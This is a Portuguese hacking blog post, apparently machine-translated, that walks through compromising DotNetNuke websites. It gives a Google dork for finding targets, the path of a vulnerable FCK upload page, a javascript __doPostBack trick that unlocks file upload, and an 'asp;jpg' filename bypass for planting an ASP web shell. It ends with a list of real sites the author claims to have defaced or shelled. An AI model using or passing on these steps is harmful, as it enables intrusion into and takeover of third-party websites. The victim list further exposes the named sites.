Hacking Website usando DotNetNuke Exploit

Postado em 22:40 by Administrador

http://img97.imageshack.us/img97/9484/website1hz.jpg

Este é um Bug antigo mais funciona ainda em sites antigos!.
DotNetNuke é propenso a um cross-site scripting vulnerabilidade porque o pedido não devidamente sanear entrada fornecida pelo usuário. Um atacante pode aproveitar essa questão para executar código arbitrário script no navegador de um usuário desavisado no contexto do local afetado. Isso pode ajudar o atacante roubar credenciais de autenticação baseada em cookie e lançar outros ataques.
Testado neste Site> http://www.e.com.ph/
1. Utilize este DORK Google para encontrar um site vulnerável.
inurl:"/portals/0"
Por exemplo:
Código:
http://www.site.com
2. Ora aqui está a explorar
Coloque esse código de exploração para o local vulnerável
Código:
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Por exemplo:
Código:
http://www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
3. Você então verá um portal onde ele irá pedir para carregar um arquivo.
* Selecionar a terceira opção de arquivo (um arquivo em seu site)
4. Após selecionar a terceira opção, substituir a barra de URL com um java script e deve permitir que você envie um arquivo como. txt,. jpg, swf,. gif, etc
Código:
javascript:__doPostBack('ctlURL$cmdUpload','')
5. Após o upload de arquivos txt como shells ou mesmo, tudo que você precisa fazer é descobrir onde o arquivo foi enviado. Por exemplo, você carregou-o nos nomes de diretório como "/ imagens", depois é só ligar o URL de destino para http://www.site.com/portals/0/Images/nameofthefile.txt
6. Como fazer upload de uma shells?

Basta mudar o nome do shell asp para "name.asp; name.jpg"e você deve ser capaz de carregar a sua casca. E o site deve ser seu também.

Alguns dos locais que eu hacked e carregado de uma shell. Aqueles com. jpg são os escudos que eu enviei e as com. txt são os meus cumprimentos
Código:
http://64.78.7.54/portals/0/hacked.txt
http://64.78.7.54/portals/0/a.asp;a.jpg
Código:
http://adimoto.li/portals/0/hacked.txt
http://adimoto.li/portals/0/a.asp;a.jpg
Código:
http://www.youthencounter.org/portals/0/hacked.txt
http://www.youthencounter.org/portals/0/a.asp;a.jpg
Código:
http://warrock.amped.ph/portals/0/hacked.txt
http://warrock.amped.ph/portals/0/a.asp;a.jpg
Sites eu não carregou com shells
Código:

http://adimoto.li/portals/0/hacked.txt
http://adimoto.li/portals/0/a.asp;a.jpg
http://www.demo4x.com/portals/0/hacked.txt
http://mcphie.com.au/portals/0/th3d.txt
http://heb.dolphinreef.co.il/portals/0/th3d.txt
http://pmi-rome.org/portals/0/th3d.txt
http://nuke.bloudi.com/portals/0/th3d.txt
http://www.terminusproducts.com/portals/0/hacked.txt
Este é um Bug antigo mais funciona ainda em alguns sites antigos!.

Sem resposta para "Hacking Website usando DotNetNuke Exploit"